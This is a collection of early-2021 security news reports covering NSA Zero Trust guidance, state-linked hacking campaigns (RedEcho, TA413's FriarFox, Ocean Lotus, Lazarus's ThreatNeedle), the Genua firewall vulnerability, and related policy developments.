“Zero Trust is a security model, a set of system design principles, and coordinated cybersecurity and system management strategy based on an acknowledgement that threats exist both inside and outside traditional network boundaries.” reads the document published by the “This security model eliminates implicit trust in any one element, node, or service and instead requires continuous verification of the operational picture via real-time information fed from multiple sources to determine access and other system responses.”
Zero Trust security model
This security model assumes a data-centric security approach and is based on security monitoring and granular risk-based access controls. The model applies the concept of least-privileged access for every resource and decision.
The adoption of this approach for modern dynamic threat environment requires:
Coordinated and aggressive system monitoring, system management, and defensive operations capabilities.
Assuming all requests for critical resources and all network traffic may be malicious.
Assuming all devices and infrastructure may be compromised.
Accepting that all access approvals to critical resources incur risk, and being prepared to perform rapid damage assessment, control, and recovery operations.
For example, adopting a strong multi-factor authentication of users for Zero Trust environments, can reduce the risk of a data breach.
The implementation of this model could be a gradual process that requires additional resources, capabilities, and a strong commitment of the executives.
“NSA recommends embracing the Zero Trust security model when considering how to integrate Zero Trust concepts into an existing environment.” concludes the document. “Zero Trust efforts should be planned out as a continually maturing roadmap, from initial preparation to basic, intermediate, and advanced stages, with cybersecurity protection, response, and operations improving over time.”
AI Panel Urges US to Boost Tech Skills Amid China's Rise
2.3.2021 BigBrothers Securityweek
Artificial Intelligence
An artificial intelligence commission led by former Google CEO Eric Schmidt is urging the U.S. to boost its AI skills to counter China, including by pursuing “AI-enabled” weapons – something that Google itself has shied away from on ethical grounds.
Schmidt and current executives from Google, Microsoft, Oracle and Amazon are among the 15 members of the National Security Commission on Artificial Intelligence, which released its final report to Congress on Monday.
“To win in AI we need more money, more talent, stronger leadership,” Schmidt said Monday.
The report says that machines that can “perceive, decide, and act more quickly” than humans and with more accuracy are going to be deployed for military purposes — with or without the involvement of the U.S. and other democracies. It warns against unchecked use of autonomous weapons but expresses opposition to a global ban.
It also calls for “wise restraints” on the use of AI tools such as facial recognition that can be used for mass surveillance.
“We have to develop technology that preserves our Western values, but we have to be prepared for a world in which not everyone is doing that,” said Andrew Moore, a commissioner and the head of Google Cloud AI.
The group has the ear of top lawmakers from both parties, but has attracted criticism for including many members who work for tech companies with big government contracts, and who thus have a lot at stake in federal rules on emerging technology.
The report calls for a “White House-led strategy” to defend against AI-related threats, to set standards on how intelligent machines can be used responsibly and to boost U.S. research and development to maintain the nation’s technological advantage over China.
“We believe we are one or two years ahead of China, not five or 10,” Schmidt told the Senate Armed Services Committee last week. He clarified Monday that that he was expressing his personal opinions and not necessarily those of the commission.
It’s not yet clear whether President Joe Biden’s administration is on board with the commission’s approach. It’s still awaiting confirmation of a new director for the White House Office of Science and Technology Policy, which Biden has elevated to a Cabinet-level position.
“AI policy tends to be very bipartisan,” said Michael Kratsios, who was U.S. chief technology officer under President Donald Trump and led a push to pump more resources into AI development across federal agencies. The greatest imperative, he said, is that “the next great AI technologies are developed in the West.”
One big difference between the two administrations is likely to be the approach to building AI talent. The commission recommends a more open immigration policy than what Trump favored.
Congress formed the AI panel in 2018 and appointed 12 of its 15 commissioners, with the others picked by Trump’s Defense and Commerce secretaries. A judge later compelled the commission to make its meetings and records more accessible to the public after a civil liberties group, the Electronic Privacy Information Center, challenged its secrecy.
It’s been led by Schmidt, who was Google’s CEO and later the executive chairman of its parent company Alphabet. He previously helped lead the Defense Innovation Board, which advises the Pentagon on new technology.
That brought some conflict in 2018 when Google backed out of Project Maven, a U.S. military initiative using AI-based computer vision technology to analyze drone footage in conflict zones. The company, responding to internal activism from employees, also pledged not to use AI in any weapons-related applications.
“I did not agree with the Google decisions on Maven,” Schmidt told senators last week, calling it an “aberration” compared to the tech industry as a whole, where he says there are plenty of companies that want to work with the military. He said AI and machine vision systems are particularly good at “watching for things,” which is something the military spends a lot of time doing.
The commission also includes executives like Safra Catz, the CEO of software giant Oracle, and Amazon’s incoming CEO, Andy Jassy, who currently runs its cloud computing division, as well as top AI experts at Microsoft and Google. All four companies have competed against each other for federal cloud computing contracts. The representatives from Microsoft and Google joined other members in approving the final report Monday, but abstained from the section relating to government partnerships with the private sector.
Excluding human rights groups and rank-and-file tech experts from the commission has led the group to more easily frame this policy issue as a “democracy versus authoritarianism” competition against China while skirting more difficult topics, like the use of AI technologies on the U.S.-Mexico border, said Jack Poulson, a former Google researcher who now directs industry watchdog Tech Inquiry.
“The nominal reason to have these tech CEOs on these committees is they’re experts in the technology. But they’re also, subject to shareholder requirements, acting in the interests of their companies,” Poulson said. “They don’t want significant regulation or antitrust enforcement.”
The government-industry partnership may be important for the U.S. and its allies to help set standards for the responsible use of AI, said Megan Lamberth, a research associate at the Center for a New American Security.
“AI has the potential to really transform not only how militaries fight wars, but how economies operate and how societies and people interact with each other,” Lamberth said. “If there’s a gap in leadership, another country is going to fill that void.”
The American Civil Liberties Union said in a statement Monday that the commission made useful recommendations but it should have gone further by establishing civil rights protections now, before AI systems are widely deployed by intelligence agencies and the military.
The commission asked Congress to make new laws requiring federal agencies to conduct human rights assessments of new AI systems used on Americans. But it didn’t recommend the binding surveillance limits sought by activists.
US Right-Wing Platform Gab Acknowledges it Was Hacked
2.3.2021 BigBrothers Securityweek
The CEO of Gab, a social network favored by the US political right, said the platform had been attacked by "demon hackers" after an activist group released user data described as an important resource for research on the far right.
The activist group called DDoSecrets Collective released the data over the weekend to Wired magazine, claiming it offered "a record of the culture" related to the violent siege of the US Capitol on January 6.
The data included passwords and private messages on thousands of accounts.
Gab chief executive Andrew Torba claimed in a Twitter message Sunday that "demon hackers (I'm very serious) are attacking Gab right now," also calling members of the group "mentally ill" and using a slur to refer to them as members of the trans community.
"The same people behind this attack targeted law enforcement officers and their families last summer," Torba wrote, adding that the company was working with authorities to investigate.
The activist group denied Torba's allegations and said it would release the data to researchers and journalists.
"Our view is that data is a resource and a record," the collective said in a blog post.
A member of the collective told Wired that the data was a "gold mine of research for people looking at militias, neo-Nazis, the far right, QAnon, and everything surrounding January 6."
The group's website said the data was "an important sociological resource" and "a record of the culture and the exact statements surrounding not only an increase in extremist views and actions, but an attempted coup."
Gab is one of several platforms which have attracted large numbers of conservatives by steering clear of the moderation efforts imposed by Facebook and Twitter, which banned former president Donald Trump and some of his supporters for inciting violence.
NSA Publishes Guidance on Adoption of Zero Trust Security
2.3.2021 BigBrothers Securityweek
The U.S. National Security Agency (NSA) has published guidance on how security professionals can secure enterprise networks and sensitive data by adopting a Zero Trust security model.
Titled “Embracing a Zero Trust Security Model,” the document details the benefits and challenges of the security model, and also provides a series of recommendations on the implementation of Zero Trust within existing networks.
Leveraging a set of system design principles and a cyber-security management strategy, the Zero Trust model assumes that a breach has occurred or is inevitable and eliminates trust in systems, nodes, and services, requiring continuous verification through real-time information.
Zero Trust allows administrators to limit access and control the manner in which devices, processes, and users engage with data, to eliminate the abuse of compromised credentials, along with remote exploitation, and insider threats.
“Systems that are designed using Zero Trust principals should be better positioned to address existing threats, but transitioning to such a system requires careful planning to avoid weakening the security posture along the way. NSA continues to monitor the technologies that can contribute to a Zero Trust solution and will provide additional guidance as warranted,” the NSA notes.
Addressing the modern threat environment, the agency says, requires aggressive system monitoring and management, defensive operations capabilities, assuming requests for critical resources may be malicious, assuming the compromise of any device or infrastructure, accepting the risks associated with access to critical resources, and preparedness for rapid damage assessment and remediation.
With Zero Trust, every user, application/workload, device, and data flow is considered untrusted and access is denied by default, resources are protected and operated with the assumption that they might have been compromised, and access to all resources is provided in a secure manner.
The design of a Zero Trust solution, the NSA notes, implies defining mission outcomes, first protecting Data/Assets/Applications/Services (DAAS) and securing access paths, determining who needs access to the DAAS, creating control policies, and constantly looking for suspicious activity through full visibility into all activity (the inspection of all traffic logs).
The NSA also explains that implementing Zero Trust requires time and effort, and that additional capabilities are required to transition to a mature Zero Trust architecture, for full benefits. Furthermore, the agency says, it is not necessary to move to a mature Zero Trust architecture all at once, as such implementations mature over time, enabling defenders to keep up with threats.
Challenges faced when implementing Zero Trust may include the lack of full support within the enterprise, “possibly from leadership, administrators, or users,” scalability, the need to continuously apply access control decisions, and fatigue from constantly applying default-deny security policies.
“The Zero Trust mindset focuses on securing critical data and access paths by eliminating trust as much as possible, coupled with verifying and regularly re-verifying every allowed access. However, implementing Zero Trust should not be undertaken lightly and will require significant resources and persistence to achieve,” the NSA also points out.
US Shifts State Grant Focus to Extremism, Cyberthreats
2.3.2021 BigBrothers Securityweek
State and local governments will be required to spend a portion of nearly $1.9 billion in annual federal public safety grants on the fight against domestic extremism and improved cybersecurity, the Department of Homeland Security said Thursday.
The requirement reflects the security priorities of President Joe Biden’s new administration as it confronts a growing threat from extremists and the fallout from a suspected Russian hack of government and private-sector computer networks.
Secretary of Homeland Security Alejandro Mayorkas said it was the first time since the agency, which was created in response to the Sept. 11, 2001, terrorist attacks, had directed that domestic violent extremism be specified as a national priority in programs to help state and local law enforcement agencies respond to emergencies.
“Today the most significant terrorist threat facing the nation comes from lone offenders and small groups of individuals who commit acts of violence motivated by domestic extremist ideological beliefs,” Mayorkas said in announcing the shift.
State and local government agencies will still have leeway. DHS will require that 7.5% of the grants be devoted to detecting and protecting against domestic extremism and an equal portion for cybersecurity, including to conduct risk assessments and training.
DHS will also now prohibit using the grants to buy military equipment, including grenade launchers, bayonets and “weaponized” aircraft, Mayorkas said. The use of such weaponry, which became increasingly prevalent after the Sept. 11 attacks, has been criticized as unnecessary and leading to the militarization of local law enforcement.
Mayorkas said DHS will continue to support the purchase of equipment that has “demonstrable impact on enhancing the safety of law enforcement and members of the public,” without specifying what that might entail.
About half of the money covered comes from two widely used grants: the State Homeland Security Program and the Urban Area Security Initiative. Both are administered by the Federal Emergency Management Agency.
That translates into at least $77 million to address domestic extremism, funds that Mayorkas said can be used to improve intelligence sharing across state lines, training and public awareness. It’s not new money, since it was appropriated last year, and more is needed, but it will still be useful given the widespread nature of the threat, said Tom Warrick, a former DHS deputy assistant secretary for counterterrorism policy.
The requirement should “get state and local governments thinking creatively how to address these threats,” said Warrick, now with the Atlantic Council.
The set-aside for cybersecurity comes as U.S. authorities and private security firms are still working to determine the scope of the suspected Russian hack, a breach first detected in December of at least nine government agencies and about 100 companies. Local governments have also been increasingly targeted by ransomware attacks.
Concerns about domestic extremism have been mounting in recent years. DHS listed domestic violent extremism, particularly by white supremacists, as among the top threats facing the nation late last year, and in January for the first time used a national terrorist advisory to warn about domestic extremism.
The agency was also accused by a whistleblower, in a complaint that is still being investigated by the Office of the Inspector General, of downplaying the danger to avoid angering then-President Donald Trump.
In the wake of the Jan. 6 insurrection, Republicans and Democrats in Congress have called for increased focus on domestic extremism.
“The irrefutable fact is that the threat of right-wing and, more specifically, white nationalist terrorism has been growing for years,” Rep. Bennie Thompson, the chairman of the House Homeland Security Committee, said at a recent hearing. “The previous administration failed to address this threat appropriately, and on Jan. 6, we saw the result right here at the United States Capitol.”
Vendor Quickly Patches Serious Vulnerability in NATO-Approved Firewall
2.3.2021 BigBrothers Securityweek
A critical vulnerability discovered in a firewall appliance made by Germany-based cybersecurity company Genua could be useful to threat actors once they’ve gained access to an organization’s network, according to Austrian cybersecurity consultancy SEC Consult.
Genua Genugate is a firewall designed for protecting internal networks against external threats, segmenting internal networks, and protecting machine-to-machine communications.
The company claims its Genugate firewall is the only one in the world to receive a “highly resistant” rating from the German government, and says it’s compliant with NATO’s “NATO Restricted” and the European Union’s “RESTREINT UE/EU RESTRICTED” requirements for data protection. The vendor says its products have been used by major industrial, government, military and other critical infrastructure organizations.
However, this does not mean Genua’s firewalls are not affected by potentially serious vulnerabilities.
SEC Consult on Monday revealed that the Genugate firewall is affected by a critical authentication bypass vulnerability (CVE-2021-27215) in the product’s administration interfaces. An attacker who has network access to an administration interface can exploit the vulnerability to log in to the device’s admin panel as any user — including the root user — regardless of the password they use.
“An attacker is able to gain full admin/root access rights within the admin web interface, which enables reconfiguration of the whole firewall, such as firewall ruleset, email filtering configuration, web application firewall settings, proxy settings, etc,” SEC Consult told SecurityWeek. “For instance, attackers could potentially change the configuration to access otherwise unreachable systems or reroute company traffic to an attacker-controlled proxy server.”
SEC Consult clarified in its advisory, “Certified and approved environments mandate that the admin interface is only reachable through a strictly separated network. Nevertheless, it is a highly critical security vulnerability and must be patched immediately.”
The vulnerability was discovered by Armin Stock of Atos Germany — IT services giant Atos acquired SEC Consult last year. The findings were reported to the vendor in late January 2021 and a patch was released just a few days later. The vulnerability appears to affect all versions of the firewall.
SecurityWeek has reached out to Genua for comment, but the company has yet to respond.
SEC Consult has published an advisory describing the vulnerability, but it has not made public proof-of-concept (PoC) code. The company has also posted a video showing how an attack works.
Chinese Hackers Targeted India's Power Grid Amid Geopolitical Tensions
2.3.2021 BigBrothers Thehackernews
Amid heightened border tensions between India and China, cybersecurity researchers have revealed a concerted campaign against India's critical infrastructure, including the nation's power grid, from Chinese state-sponsored groups.
The attacks, which coincided with the standoff between the two nations in May 2020, targeted a total of 12 organizations, 10 of which are in the power generation and transmission sector.
"10 distinct Indian power sector organizations, including four of the five Regional Load Despatch Centres (RLDC) responsible for operation of the power grid through balancing electricity supply and demand, have been identified as targets in a concerted campaign against India's critical infrastructure," Recorded Future said in a report published yesterday. "Other targets identified included 2 Indian seaports."
Chief among the victims include a power plant run by National Thermal Power Corporation (NTPC) Limited and New Delhi-based Power System Operation Corporation Limited.
Pinning the intrusions on a new group dubbed "RedEcho," investigators from the cybersecurity firm's Insikt Group said the malware deployed by the threat actor shares strong infrastructure and victimology overlaps with other Chinese groups APT41 (aka Barium, Winnti, or Wicked Panda) and Tonto Team.
Border conflicts have flared up since last year after deadly clashes between Indian and Chinese soldiers in Ladakh's Galwan Valley. While 20 Indian soldiers were killed in the clashes, China formally identified four casualties on its side for the first time on February 19.
In the intervening months, the Indian government has banned over 200 Chinese apps for allegedly engaging in activities that posed threats to "national security and defence of India, which ultimately impinges upon the sovereignty and integrity of India."
Noting that the standoff between the two countries was accompanied by increased espionage activity on both sides, Recorded Future said the attacks from China involved the use of infrastructure it tracks as AXIOMATICASYMPTOTE, which encompasses a modular Windows backdoor called ShadowPad that has been previously attributed to APT41 and subsequently shared between other Chinese state-backed actors.
Additionally, the report also raises questions about a possible connection between the skirmishes and a power blackout that crippled Mumbai last October.
While initial probe conducted by the cyber department of the western Indian state of Maharashtra traced the attack to a piece of unspecified malware identified at a Padgha-based State Load Despatch Centre, the researchers said, "the alleged link between the outage and the discovery of the unspecified malware variant remains unsubstantiated."
"However, this disclosure provides additional evidence suggesting the coordinated targeting of Indian Load Despatch Centres," they added.
Interestingly, these cyberattacks were described as originating from Chengdu, which is also the base for a network technology firm called Chengdu 404 Network Technology Company that operated as a front for a decade-long hacking spree targeting more than 100 high-tech and online gaming companies.
But it's not just China. In the weeks leading to the clashes in May, a state-sponsored group called Sidewinder — which operates in support of Indian political interests — is said to have singled out Chinese military and government entities in a spear-phishing attack using lures related to COVID-19 or the territorial disputes between Nepal, Pakistan, India, and China.
The modus operandi aside, the finding is yet another reminder of why critical infrastructure continues to be a lucrative target for an adversary looking to cut off access to essential services used by millions of people.
"The intrusions overlap with previous Indian energy sector targeting by Chinese threat activity groups in 2020 that also used AXIOMATICASYMPTOTE infrastructure," the researchers concluded. "Therefore, the focus in targeting India's electricity system possibly indicates a sustained strategic intent to access India's energy infrastructure."
We have reached out to India's Computer Emergency Response Team (CERT-IN), and we will update the story if we hear back.
EU leaders aim at boosting defense and security, including cybersecurity
1.3.2021 BigBrothers Securityaffairs
During a video conference of the members of the European Council, EU leaders agreed on a new strategy aimed at boosting defense and security.
During the recent video conference of the members of the European Council (25-26 February 2021), NATO chief Jens Stoltenberg highlighted the importance to define a strategy to boost defense and security.
“We want to act more strategically, to defend our interests and to promote our values.” said Charles Michel, President of the European Council. “We will step up our cooperation and our coordination to combat hybrid threats and disinformation.”
Member states highlighted the importance of close cooperation with NATO and strengthening partnerships with the UN and key regional partners. The EU leaders emphasized that they looked forward to cooperating with the new US administration on a strong and ambitious transatlantic agenda that included a close dialogue on security and defence.
Participants are committed to providing secure European access to space, cyberspace and the high seas.
“In light of the growing number and complexity of cyber threats, we aim to strengthen European cyber resilience and responsiveness and to improve the cybersecurity crisis management framework. Following the Cybersecurity Strategy presented in December 2020, we invite the Commission and the High Representative to report on implementation by June 2021.” reads a statement from EU leaders. “In addition, we invite the co-legislators to swiftly take work forward, particularly on the revised Directive on security of network and information systems (NIS 2 Directive). We also call for greater cooperation and coordination to prevent and respond to hybrid threats, including disinformation, inter alia by involving the private sector and relevant international actors.”
EU leaders invited the Commission and the High Representative, Josep Borrell, to work on the implementation of the Cybersecurity Strategy by June 2021.
The 27 leaders discussed on how to increase the resilience of their infrastructure to cyberattacks and hybrid threats.
“Second, we face new kinds of threats, cyber, hybrid, and disinformation. And we need to strengthen our resilience, we also need to adapt our tools.”” Michel added.
The participants were concerned about the risks associated with cyberattacks and the rise of China.
“The EU efforts are going hand in hand with the military efforts across the continent,” said Stoltenberg. “For NATO, the main task during this pandemic has been to make sure that a health crisis doesn’t turn into a security crisis, because the threats we are faced with before the pandemic, they are still there: Russia’s aggressive actions, more brutal forms of terrorism, sophisticated cyber attacks, the rise of China and the security implications of climate change.”
Microsoft releases open-source CodeQL queries to assess Solorigate compromise
27.2.2021 BigBrothers Securityaffairs
Microsoft announced the release of open-source CodeQL queries that it experts used during its investigation into the SolarWinds supply-chain attack
Microsoft has announced the availability of open-source CodeQL queries that the IT giant used during its investigation into the SolarWinds attack.
In early 2021, the US agencies FBI, CISA, ODNI, and the NSA released a joint statement that blames Russia for the SolarWinds supply chain attack.
The four agencies were part of the task force Cyber Unified Coordination Group (UCG) that was tasked for coordinating the investigation and remediation of the SolarWinds hack that had a significant impact on federal government networks.
The UCG said the attack was orchestrated by an Advanced Persistent Threat (APT) actor, likely Russian in origin.
According to the security experts, Russia-linked threat actors hacked into the SolarWinds in 2019 used the Sundrop malware to insert the Sunburst backdoor into the supply chain of the SolarWinds Orion monitoring product.
Microsoft, which was hit by the attack, published continuous updates on its investigation, and now released the source code of CodeQL queries, which were used by its experts to identify indicators of compromise (IoCs) associated with Solorigate.
“In this blog, we’ll share our journey in reviewing our codebases, highlighting one specific technique: the use of CodeQL queries to analyze our source code at scale and rule out the presence of the code-level indicators of compromise (IoCs) and coding patterns associated with Solorigate.” reads the blog post published by Microsoft. “We are open sourcing the CodeQL queries that we used in this investigation so that other organizations may perform a similar analysis. Note that the queries we cover in this blog simply serve to home in on source code that shares similarities with the source in the Solorigate implant, either in the syntactic elements (names, literals, etc.) or in functionality.”
Microsoft pointed out that these queries should be considered as just a part of the arsenal of tools to use in the investigation.
There is no guarantee that the attackers could use exactly the same functionality or coding style in other attacks, this means that the queries may fail in detecting the presence of implants in their infrastructure.
Microsoft highlighted that in order to reduce false-positive results reviews would still be required.
CodeQL is a powerful semantic code analysis engine that works in two distinct stages. In the first stage, as part of the compilation of source code into binaries, CodeQL builds a database is used to capture the model of the compiling code. In case experts are analyzing interpreted languages, CodeQL parses the source and builds its own abstract syntax tree model. in the second stage, the database is repeatedly queried. The CodeQL language enables the easy selection of complex code conditions from the database.
Microsoft is open-sourcing several of the C# queries that could be used to assess for code-level IoCs, it also provided detailed information on each query and IoCs analyzed.
“The queries we shared in this blog and described in Solorigate-Readme.md target patterns specifically associated with the Solorigate code-level IoCs, but CodeQL also provides many other options to query for backdoor functionality and detection-evasion techniques.” concludes Microsoft.
“These queries were relatively quick to author, and we were able to hunt for patterns much more accurately across our CodeQL databases and with far less effort to manually review the findings, compared to using text searches of source code. CodeQL is a powerful developer tool, and our hope is that this post inspires organizations to explore how it can be used to improve reactive security response and act as a compromise detection tool.”
Hackers are selling access to Biochemical systems at Oxford University Lab
27.2.2021 BigBrothers Securityaffairs
Hackers have broken into the biochemical systems of an Oxford University lab where researchers are working on the study of Covid-19.
Hackers compromised the systems at one of the most advanced biology labs at the Oxford University that is involved in the research on the Covid-19 pandemic.
The news was disclosed by Forbes and the Oxford University confirmed the security breach that impacted the Division of Structural Biology (known as “Strubi”).
“Oxford University confirmed on Thursday it had detected and isolated an incident at the Division of Structural Biology (known as “Strubi”) after Forbes disclosed that hackers were showing off access to a number of systems.” reported Forbes. “These included machines used to prepare biochemical samples, though the university said it couldn’t comment further on the scale of the breach.”
The University notified the authorities, including the National Cyber Security Center (NCSC) and the U.K. Information Commissioner’s Office.
“We have identified and contained the problem and are now investigating further,” an Oxford University spokesperson said. “There has been no impact on any clinical research, as this is not conducted in the affected area. As is standard with such incidents, we have notified the National Cyber Security Center and are working with them.”
The U.K. ICO confirmed that not patient data was compromised as a result of the security breach.
Forbes first reported the news and revealed it received the news of the breach by Hold Security chief technology officer Alex Holden. Holden provided screenshots showing interfaces for lab equipment, it also speculated that attackers were inside the Lab infrastructure on February 13 and February 14, 2021.
Once breached the biochemical systems of an Oxford University lab the attackers were in the position of stealing research data or sabotage the equipment.
The illustrious professor Alan Woodward speculate the involvement of a cybercrime organization, instead a state-sponsored operation, because the hackers were attempting to sell access to the Lab to third parties.
According to Holden the crew is highly sophisticated and has been privately selling stolen data from a number of organizations. Its customers are also APT groups that could use the data to targete the compromised organizations.
“He noted that the hackers spoke Portuguese. Some of the group’s other victims include Brazilian universities, Holden added, and they also use ransomware to extort some victims.” reported Forbes.
Investigation is still ongoing.
Chinese Threat Actor Uses Browser Extension to Hack Gmail Accounts
27.2.2021 BigBrothers Securityweek
In early 2021, a Chinese threat actor tracked as TA413 attempted to hack into the Gmail accounts of Tibetan organizations using a malicious browser extension, researchers with cybersecurity firm Proofpoint have discovered.
Active for roughly a decade, the hacking group has been previously associated with malware such as LuckyCat and ExileRAT, and is believed to have orchestrated numerous cyber-assaults targeting the Tibetan community.
In January and February 2021, the group was observed delivering the FriarFox extension, customized to specifically target the Firefox browser and provide attackers with access to and control of victims’ Gmail accounts. The Scanbox and Sepulcher malware families, both already attributed to the adversary, were also used in these attacks.
A phishing email used in a January attack, Proofpoint reveals, contained a link leading to a fake Adobe Flash Player update-themed page designed to run JavaScript code on the victim’s system. The code would deliver the FriarFox malicious extension, but only if Firefox was used to open the link.
Once the extension was installed, the attackers gained full access to the victim’s Gmail account, being able to search emails, archive messages, read emails, receive notifications, label emails, mark messages as spam, delete emails, refresh the inbox, forward emails, modify alerts in the browser, delete emails from the Trash folder, and send emails.
FriarFox, which appears to be a heavily altered version of the open source browser extension Gmail Notifier, also allows the adversary to access user data for all websites, read and change privacy settings, display notifications, and access the tabs opened in the browser.
As part of the attack, the Scanbox reconnaissance framework – which is known to have been used by other Chinese threat actors and even the Vietnam-linked OceanLotus – was also leveraged.
Analysis of FriarFox code has allowed Proofpoint to link the extension to known TA413 activity, while the employed infrastructure has revealed targeting of Tibetan organizations since early January 2021. Malicious files used in the attacks were created using the Royal Road tool, which is also known to be shared between Chinese APTs.
“The introduction of the FriarFox browser extension in TA413’s arsenal further diversifies a varied, albeit technically limited repertoire of tooling. The use of browser extensions to target the private Gmail accounts of users combined with the delivery of Scanbox malware demonstrates the malleability of TA413 when targeting dissident communities,” Proofpoint concludes.
Cyberattacks Launch Against Vietnamese Human-Rights Activists
26.2.2021 BigBrothers Threatpost
Vietnam joins the ranks of governments using spyware to crack down on human-rights defenders.
Human-rights activists are being targeted by cyberattacks as part of a wider effort by the Vietnamese state to censor anyone speaking out against the government, Amnesty International’s Security Lab alleges.
Ocean Lotus, a well-known threat actor dating back to 2013, is behind the spyware campaign against human-rights defenders and has long been identified as having goals “aligned with the Vietnamese state interests,” according to Amnesty International’s report on the situation.
Spyware is just the latest tool turned against dissenting bloggers and activists by the Vietnamese government, an arsenal which also includes harassment, assault, travel bans and jail, the report explained.
Vietnam’s Digital Censorship
A cybersecurity law passed in 2019 gave the government in Hanoi sweeping control over who has access to the internet, according to Amnesty International. But those human-rights defenders (HRDs) who remain online have emerged as targets for Ocean Lotus attacks, the report added.
Source: Amnesty International.
The first spyware attacks against government dissidents began in Feb. 2018, according to Amnesty International’s investigation.
The targets have included pro-democracy activist Bui Thanh Hieu, now living in Germany; the Vietnamese Overseas Initiative for Conscience Empowerment (VOICE) (a non-profit supporting Vietnamese refugees and human rights); and an unidentified blogger inside Vietnam who is a critic of the government. All of them received emails with spyware either as an attachment or link, researchers said..
The Security Lab team identified spyware for both macOS and Windows operating systems.
“The Windows spyware was a variant of a malware family called Kerrdown, and used exclusively by the Ocean Lotus group,” the report explained. “Kerrdown is a downloader that installs additional spyware from a server on the victim’s system and opens a decoy document.”
The link downloaded the Cobalt Strike penetration testing toolkit, giving the attackers control over the targeted system and arming them to spread laterally.
The macOS version of Cobalt Strike is a bespoke version of malware used only by Ocean Lotus, the report added.
Amnesty International suggests anyone who might be a target of this type of malware attack should pay close attention to links, enable two-factor authentication (2FA), use antivirus software and running software updates.
Cyberattacks Against Human Rights Defenders
This latest report is just another instance in a long list of state-aligned campaigns organized against human-rights defenders and civil society.
This week, Tibetan communities were targeted by a customized malicious Firefox extension to provide access and control to threat actors working with the Chinese Communist Party, according to researchers at Proofpoint.
And last summer, Android spyware called ActionSpy, was sent to victims across Tibet, Turkey and Taiwan in an effort to collect data on minority Uyghur populations, victims of Chinese-state-sponsored human rights abuses.
Other malware including Android surveillance tools called SilkBean, GoldenEagle, CarbonSteal and Double-Agent were also deployed by Chinese government aligned actors in July as part of the ongoing surveillance campaign of Uyghur Muslims, dating back to 2013.
The security industry, along with Amnesty International and other groups like the Electronic Frontier Foundation, continue to raise the alarm about the real-world, life-and-death consequences of cybersecurity when tools are turned against the globe’s most vulnerable populations.
“When we talk about security, we have to ask, ‘security for who?'” EFF’s Eva Galperin explained at a 2019 Black Hat session called “Hacking for the Greater Good: Empowering Technologists to Strengthen Digital Society.” “It’s usually for governments or corporations. We don’t talk about security for individuals, particularly individuals who don’t have a lot of spending money.”
China-linked TA413 group target Tibetan organizations
26.2.2021 BigBrothers Securityaffairs
The Chinese hacking group, tracked as TA413, used a malicious Firefox add-on in a cyberespionage campaign aimed at Tibetans.
China-linked cyberespionage group TA413 targeted Tibetan organizations across the world using a malicious Firefox add-on, dubbed FriarFox, that allowed them to steal Gmail and Firefox browser data and deliver malware on infected systems.
“We attribute this activity to TA413, who in addition to the FriarFox browser extension, was also observed delivering both Scanbox and Sepulcher malware to Tibetan organizations in early 2021.” reads the report published by Proofpoint. “Proofpoint has previously reported on Sepulcher malware and its links to the Lucky Cat and Exile Rat malware campaigns that targeted Tibetan organizations.”
The attack chain begins with spear-phishing email messages that attempt to trick victims into visiting websites that asked them to install a Flash update to view the site’s content.
Researchers from Proofpoint discovered that the websites were set up to serve the malicious add-on only to Firefox users with an active Gmail session.
The victims are served the FriarFox extension from hxxps://you-tube[.]tv/download.php, then they are prompted to allow the download of software from the site, and they are prompted to “Add” the browser extension named “Flash update components” by approving the extension’s permissions. The browser redirects to the benign webpage hxxps://Tibet[.]net and it is displayed the message “Flash update components has been added to Firefox.”
Once installed the FriarFox browser extension, attackers gained access to the user’s Gmail account and FireFox browser data. Below the the Gmail account functionality and FireFox browser attributes FriarFox attempts to collect:
Gmail Access
Search emails
Archive emails
Receive Gmail notifications
Read emails
Alter FireFox browser audio and visual alert features for the FriarFox extension
Label emails
Marks emails as spam
Delete messages
Refresh inbox
Forward emails
Perform function searches
Delete messages from Gmail trash
Send mail from compromised account
FireFox Browser Access – (Based on Granted browser permissions)
Access user data for all websites.
Display notifications
Read and modify privacy settings
Access browser tabs.”
The FriarFox add on also contacts the C2 server to retrieve the PHP and JS-based payload Scanbox frameworks.
The Scanbox framework is used by multiple APT groups, including the Stone Panda APT group and LuckyMouse, to carry out watering hole attacks.
“The use of browser extensions to target the private Gmail accounts of users combined with the delivery of Scanbox malware demonstrates the malleability of TA413 when targeting dissident communities. These communities have a traditionally low barrier for compromise by threat actor groups and TA413 appears to be modulating their tools and techniques while continuing to rely on proven social engineering techniques.” concludes the report. “Their degrees of success may vary among more sophisticated targets, however, the limited resources afforded to dissident organizations globally may allow for success with the patchwork of tooling and techniques TA413 displays.”
Here's How North Korean Hackers Stole Data From Isolated Network Segment
26.2.2021 BigBrothers Securityweek
During an attack on the defense industry, the North Korea-linked threat group known as Lazarus was able to exfiltrate data from a restricted network segment by taking control of a router and setting it up as a proxy server.
For initial access, the group used phishing emails featuring COVID-19 themes and containing publicly available personal information of the intended victims. Next, they focused on credential harvesting and lateral movement, including gaining access to and exfiltrating data from restricted network segments.
Active since at least 2009, Lazarus has orchestrated multiple high-profile attacks. In 2019, they focused on crypto-currency exchanges, but switched to targeting COVID-19 research in 2020, including vaccine maker Pfizer. The group has also targeted security researchers, Google warned recently.
In a report this week, Kaspersky said Lazarus had been targeting the defense industry since at least mid-2020 using a malware cluster it named ThreatNeedle, which is an advanced cluster of the Manuscrypt malware (also known as NukeSped).
Through the use of spear-phishing, the attackers attempted to lure victims into opening a malicious Microsoft Office document and enabling macros to run, with multiple emails being delivered during the last two weeks of May 2020.
In early June, one malicious attachment was opened, providing the hackers with remote control of the system. The ThreatNeedle backdoor was deployed onto the victim’s system, allowing the adversary to perform reconnaissance and deploy additional payloads.
A ThreatNeedle installer-type malware was used for lateral movement, responsible for implanting the next stage loader-type malware, which in turn executes the ThreatNeedle backdoor in memory. The backdoor can manipulate files and directories, gather system info, control and update the backdoor, enter sleep/hibernation mode, and execute commands received from the attackers.
Following the initial foothold, the threat actor proceeded with the execution of a credential harvesting tool named Responder, and lateral movement. They were even able to steal data from a network segment that was cut off from the internet, by compromising a router used to connect to it.
Despite the organization’s effort to keep specific data secure using network segmentation, Lazarus was able to harvest administrative credentials to the router (a virtual machine running CentOS) used to connect to both network segments.
Furthermore, the hackers configured the Apache web server and used the router as a proxy between the two network segments. Thus, not only were they able to deploy malware onto machines in the restricted network segment, but they also managed to exfiltrate data from these machines (transfer of data between the two networks was otherwise strictly forbidden).
